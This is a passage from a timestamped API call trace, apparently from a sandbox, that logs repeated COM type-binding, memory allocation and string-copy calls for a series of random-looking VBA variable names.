ppTypeComp=0x4, pDummy=0xfae) returned 0x0 [0060.391] CRetailMalloc_Alloc () returned 0x87504e0 [0060.391] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f0536 | out: _Dst=0x87504e0) returned 0x0 [0060.392] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.392] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_ubhqMnsVp", lHashVal=0x10c309, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.392] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f0536 | out: _Dst=0x345c9c) returned 0x0 [0060.392] CRetailMalloc_Free () returned 0xb820401 [0060.392] ITypeComp:RemoteBind (in: This=0x87ce890, szName="QDHmow", lHashVal=0x102113, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfb0 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfb0) returned 0x0 [0060.392] ITypeComp:RemoteBind (in: This=0x87ce668, szName="QDHmow", lHashVal=0x102113, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfb0 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfb0) returned 0x0 [0060.393] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="QDHmow", lHashVal=0x102113, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfb0 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfb0) returned 0x0 [0060.393] ITypeComp:RemoteBind (in: This=0x87cef08, szName="QDHmow", lHashVal=0x102113, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfb0 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfb0) returned 0x0 [0060.393] CRetailMalloc_Alloc () returned 0x87fc638 [0060.393] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f055e | out: _Dst=0x87fc638) returned 0x0 [0060.394] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.394] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_QDHmow", lHashVal=0x109bbc, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.394] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f055e | out: _Dst=0x345c9c) returned 0x0 [0060.394] CRetailMalloc_Free () returned 0x6b30301 [0060.394] ITypeComp:RemoteBind (in: This=0x87ce890, szName="WnfNMuE", lHashVal=0x10f4c9, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfb2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfb2) returned 0x0 [0060.394] ITypeComp:RemoteBind (in: This=0x87ce668, szName="WnfNMuE", lHashVal=0x10f4c9, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfb2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfb2) returned 0x0 [0060.394] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="WnfNMuE", lHashVal=0x10f4c9, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfb2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfb2) returned 0x0 [0060.395] ITypeComp:RemoteBind (in: This=0x87cef08, szName="WnfNMuE", lHashVal=0x10f4c9, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfb2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfb2) returned 0x0 [0060.395] CRetailMalloc_Alloc () returned 0x87fc638 [0060.395] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f0582 | out: _Dst=0x87fc638) returned 0x0 [0060.396] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.396] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_WnfNMuE", lHashVal=0x10f84d, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.396] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f0582 | out: _Dst=0x345c9c) returned 0x0 [0060.396] CRetailMalloc_Free () returned 0x6b30301 [0060.396] ITypeComp:RemoteBind (in: This=0x87ce890, szName="tCspNb", lHashVal=0x106181, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfb4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfb4) returned 0x0 [0060.396] ITypeComp:RemoteBind (in: This=0x87ce668, szName="tCspNb", lHashVal=0x106181, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfb4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfb4) returned 0x0 [0060.397] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="tCspNb", lHashVal=0x106181, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfb4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfb4) returned 0x0 [0060.397] ITypeComp:RemoteBind (in: This=0x87cef08, szName="tCspNb", lHashVal=0x106181, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfb4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfb4) returned 0x0 [0060.397] CRetailMalloc_Alloc () returned 0x87fc638 [0060.397] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f05a6 | out: _Dst=0x87fc638) returned 0x0 [0060.398] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.398] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_tCspNb", lHashVal=0x10dc2a, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.398] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f05a6 | out: _Dst=0x345c9c) returned 0x0 [0060.398] CRetailMalloc_Free () returned 0x6b30301 [0060.398] CRetailMalloc_Realloc () returned 0x76fc6a8 [0060.398] ITypeComp:RemoteBind (in: This=0x87ce890, szName="cCJOw", lHashVal=0x10f79e, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfb6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfb6) returned 0x0 [0060.398] ITypeComp:RemoteBind (in: This=0x87ce668, szName="cCJOw", lHashVal=0x10f79e, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfb6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfb6) returned 0x0 [0060.399] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="cCJOw", lHashVal=0x10f79e, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfb6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfb6) returned 0x0 [0060.399] ITypeComp:RemoteBind (in: This=0x87cef08, szName="cCJOw", lHashVal=0x10f79e, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfb6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfb6) returned 0x0 [0060.399] CRetailMalloc_Alloc () returned 0x87fc638 [0060.399] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f05ca | out: _Dst=0x87fc638) returned 0x0 [0060.400] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.400] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_cCJOw", lHashVal=0x10bb8b, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.400] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f05ca | out: _Dst=0x345c9c) returned 0x0 [0060.400] CRetailMalloc_Free () returned 0x6b30301 [0060.400] ITypeComp:RemoteBind (in: This=0x87ce890, szName="EZemE", lHashVal=0x10c2ce, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfb8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfb8) returned 0x0 [0060.400] ITypeComp:RemoteBind (in: This=0x87ce668, szName="EZemE", lHashVal=0x10c2ce, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfb8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfb8) returned 0x0 [0060.401] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="EZemE", lHashVal=0x10c2ce, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfb8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfb8) returned 0x0 [0060.401] ITypeComp:RemoteBind (in: This=0x87cef08, szName="EZemE", lHashVal=0x10c2ce, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfb8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfb8) returned 0x0 [0060.402] CRetailMalloc_Alloc () returned 0x87fc638 [0060.402] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f05ee | out: _Dst=0x87fc638) returned 0x0 [0060.403] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.403] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_EZemE", lHashVal=0x1086bb, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.403] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f05ee | out: _Dst=0x345c9c) returned 0x0 [0060.403] CRetailMalloc_Free () returned 0x6b30301 [0060.404] ITypeComp:RemoteBind (in: This=0x87ce890, szName="Uo47uB", lHashVal=0x10dad0, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfba | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfba) returned 0x0 [0060.404] ITypeComp:RemoteBind (in: This=0x87ce668, szName="Uo47uB", lHashVal=0x10dad0, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfba | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfba) returned 0x0 [0060.405] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="Uo47uB", lHashVal=0x10dad0, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfba | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfba) returned 0x0 [0060.405] ITypeComp:RemoteBind (in: This=0x87cef08, szName="Uo47uB", lHashVal=0x10dad0, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfba | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfba) returned 0x0 [0060.405] CRetailMalloc_Alloc () returned 0x87fc638 [0060.405] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f0612 | out: _Dst=0x87fc638) returned 0x0 [0060.406] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.406] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_Uo47uB", lHashVal=0x10553a, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.406] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f0612 | out: _Dst=0x345c9c) returned 0x0 [0060.406] CRetailMalloc_Free () returned 0x6b30301 [0060.406] ITypeComp:RemoteBind (in: This=0x87ce890, szName="HDVNj", lHashVal=0x10d6bb, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfbc | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfbc) returned 0x0 [0060.406] ITypeComp:RemoteBind (in: This=0x87ce668, szName="HDVNj", lHashVal=0x10d6bb, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfbc | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfbc) returned 0x0 [0060.407] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="HDVNj", lHashVal=0x10d6bb, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfbc | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfbc) returned 0x0 [0060.407] ITypeComp:RemoteBind (in: This=0x87cef08, szName="HDVNj", lHashVal=0x10d6bb, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfbc | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfbc) returned 0x0 [0060.407] CRetailMalloc_Alloc () returned 0x87fc638 [0060.407] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f0636 | out: _Dst=0x87fc638) returned 0x0 [0060.408] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.408] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_HDVNj", lHashVal=0x109aa8, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.408] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f0636 | out: _Dst=0x345c9c) returned 0x0 [0060.408] CRetailMalloc_Free () returned 0x6b30301 [0060.408] ITypeComp:RemoteBind (in: This=0x87ce890, szName="htvLAZ", lHashVal=0x103b8b, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfbe | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfbe) returned 0x0 [0060.408] ITypeComp:RemoteBind (in: This=0x87ce668, szName="htvLAZ", lHashVal=0x103b8b, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfbe | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfbe) returned 0x0 [0060.409] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="htvLAZ", lHashVal=0x103b8b, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfbe | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfbe) returned 0x0 [0060.409] ITypeComp:RemoteBind (in: This=0x87cef08, szName="htvLAZ", lHashVal=0x103b8b, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfbe | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfbe) returned 0x0 [0060.409] CRetailMalloc_Alloc () returned 0x87fc638 [0060.409] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f065a | out: _Dst=0x87fc638) returned 0x0 [0060.410] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.410] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_htvLAZ", lHashVal=0x10b634, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.410] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f065a | out: _Dst=0x345c9c) returned 0x0 [0060.410] CRetailMalloc_Free () returned 0x6b30301 [0060.410] ITypeComp:RemoteBind (in: This=0x87ce890, szName="UMniT6", lHashVal=0x102a4d, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfc0 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfc0) returned 0x0 [0060.410] ITypeComp:RemoteBind (in: This=0x87ce668, szName="UMniT6", lHashVal=0x102a4d, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfc0 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfc0) returned 0x0 [0060.411] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="UMniT6", lHashVal=0x102a4d, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfc0 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfc0) returned 0x0 [0060.411] ITypeComp:RemoteBind (in: This=0x87cef08, szName="UMniT6", lHashVal=0x102a4d, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfc0 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfc0) returned 0x0 [0060.411] CRetailMalloc_Alloc () returned 0x87fc638 [0060.411] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f067e | out: _Dst=0x87fc638) returned 0x0 [0060.411] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ljEFq5", cchCount1=-1, lpString2="_B_var_UMniT6", cchCount2=-1) returned 3 [0060.412] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.412] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_UMniT6", lHashVal=0x10a4f6, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.412] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f067e | out: _Dst=0x345c9c) returned 0x0 [0060.412] CRetailMalloc_Free () returned 0x6b30301 [0060.412] ITypeComp:RemoteBind (in: This=0x87ce890, szName="ncvaL", lHashVal=0x107a90, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfc2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfc2) returned 0x0 [0060.412] ITypeComp:RemoteBind (in: This=0x87ce668, szName="ncvaL", lHashVal=0x107a90, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfc2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfc2) returned 0x0 [0060.413] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="ncvaL", lHashVal=0x107a90, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfc2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfc2) returned 0x0 [0060.413] ITypeComp:RemoteBind (in: This=0x87cef08, szName="ncvaL", lHashVal=0x107a90, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfc2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfc2) returned 0x0 [0060.413] CRetailMalloc_Alloc () returned 0x87fc638 [0060.413] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f06a2 | out: _Dst=0x87fc638) returned 0x0 [0060.414] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.414] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_ncvaL", lHashVal=0x103e7d, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.414] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f06a2 | out: 